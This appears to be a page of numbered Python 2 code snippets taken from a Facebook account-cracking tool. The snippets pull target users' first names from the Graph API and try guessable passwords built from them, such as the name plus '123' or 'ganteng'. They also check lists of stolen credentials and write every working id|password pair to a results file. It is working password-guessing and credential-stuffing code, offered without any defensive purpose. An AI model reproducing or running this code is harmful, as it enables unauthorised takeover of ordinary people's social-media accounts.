예제 #1
0
 def g(self, a):
     p = requests.Session()
     s = token.token(a)
     if s != False:
         lo = login.log(p, a)
         if lo != False:
             self.randc(s, p)
예제 #2
0
 def run(self, a):
     self.ok += 1
     f = token.token(a)
     if f is False:
         self.fail += 1
     else:
         self.grab(f)
 def crack(self, id):
     self.suc += 1
     try:
         sz = requests.get("https://graph.facebook.com/%s?access_token=%s" %
                           (id, self.token)).json()
         for i in [
                 "%s123" % (sz["first_name"]),
                 "%s12345" % (sz["first_name"]),
                 "%scantik" % (sz["first_name"]),
                 "%sganteng" % (sz["first_name"])
         ]:
             try:
                 login = token.token("%s|%s" % (id, i))
                 if login != False:
                     if id in open("out/multiresult.txt").read():
                         continue
                     else:
                         self.found.append("%s|%s" % (id, i))
                         open("out/multiresult.txt",
                              "a").write("%s|%s\n" % (id, i))
                         break
             except:
                 pass
     except:
         pass
     print "\r%s[+]%s Cracking: %s/%s - Found:-%s%s%s" % (
         G, N, self.suc, len(self.a), G, len(self.found), N),
     sys.stdout.flush()
 def __init__(self):
     ngontol()
     self.suc = 0
     self.found = []
     self.cp = []
     config = open("config/config.json").read()
     self.config = json.loads(config)
     self.token = token.token("%s|%s" %
                              (self.config["email"], self.config["pass"]))
     if self.token != False:
         self.fl()
     else:
         exit("%s[!]%s logi  failed." % (R, N))
예제 #5
0
 def __init__(self):
     self.token=""
     self.count=0
     self.fo=[]
     config=open("config/config.json").read()
     self.config=json.loads(config)
     z=token.token("%s|%s"%(self.config["email"],self.config["pass"]))
     if z !=False:
         if os.path.exists("out"):
             self.token=z
             self.id()
         else:
             os.mkdir("out")
             self.id()
     else:exit("%s[!]%s login failed."%(R,N))
 def crack(self, id):
     self.suc += 1
     try:
         login = token.token("%s|%s" % (id, self.pw))
         if login != False:
             if id in open("out/multiresult.txt").read():
                 pass
             else:
                 self.found.append("%s|%s" % (id, self.pw))
                 open("out/multiresult.txt",
                      "a").write("%s|%s\n" % (id, self.pw))
     except:
         pass
     print "\r%s[+]%s Cracking: %s/%s - Found:-%s%s%s" % (
         G, N, self.suc, len(self.a), G, len(self.found), N),
     sys.stdout.flush()
예제 #7
0
 def file(self):
     try:
         s = open(raw_input("[?] Account List: ")).read().splitlines()
     except Exception as e:
         print "[!] %s" % (e)
         self.file()
     for i in s:
         try:
             t = token.token(i)
             if t is False:
                 continue
             else:
                 scan(t, i)
         except:
             continue
     raw_input("\npress enter to menu...")
     interpreter.ASU()